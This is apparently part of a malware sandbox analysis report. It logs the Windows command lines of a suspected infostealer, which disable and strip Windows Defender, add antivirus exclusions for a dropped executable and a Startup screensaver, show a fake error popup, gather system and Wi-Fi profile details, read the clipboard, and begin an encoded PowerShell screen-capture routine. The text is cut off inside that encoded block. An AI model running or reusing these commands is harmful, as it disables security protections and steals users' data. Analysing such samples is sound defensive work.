File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:36:51
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:36:51
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:36:51
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()""
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	13:36:51
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:36:51
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	13:36:51
Start date:	05/12/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()"
Imagebase:	0x7ff7d9d20000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	13:36:51
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	13:36:51
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	13:36:52
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	13:36:52
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	13:36:52
Start date:	05/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff79c5e0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	13:36:53
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	13:36:53
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	13:36:53
Start date:	05/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff719d10000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	13:36:57
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	13:36:57
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	13:36:57
Start date:	05/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase:	0x7ff76f8a0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	13:36:58
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	13:36:58
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	13:36:58
Start date:	05/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase:	0x7ff76f8a0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	13:36:58
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	13:36:58
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	13:36:58
Start date:	05/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff719d10000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	13:36:59
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8176, Parent PID: 8164

General

Target ID:	44
Start time:	13:36:59
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	13:36:59
Start date:	05/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff719d10000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	13:37:00
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	13:37:00
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	13:37:00
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	13:37:00
Start date:	05/12/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff684790000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	13:37:02
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7744, Parent PID: 280

General

Target ID:	51
Start time:	13:37:02
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7504, Parent PID: 7744

General

Target ID:	52
Start time:	13:37:02
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	13:37:02
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	13:37:02
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	13:37:02
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	13:37:02
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: tasklist.exePID: 7352, Parent PID: 7744

General

Target ID:	57
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff79c5e0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff79c5e0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff786950000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff719d10000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff61c4c0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff79c5e0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	13:37:03
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	13:37:04
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	13:37:04
Start date:	05/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff757dd0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	13:37:04
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcw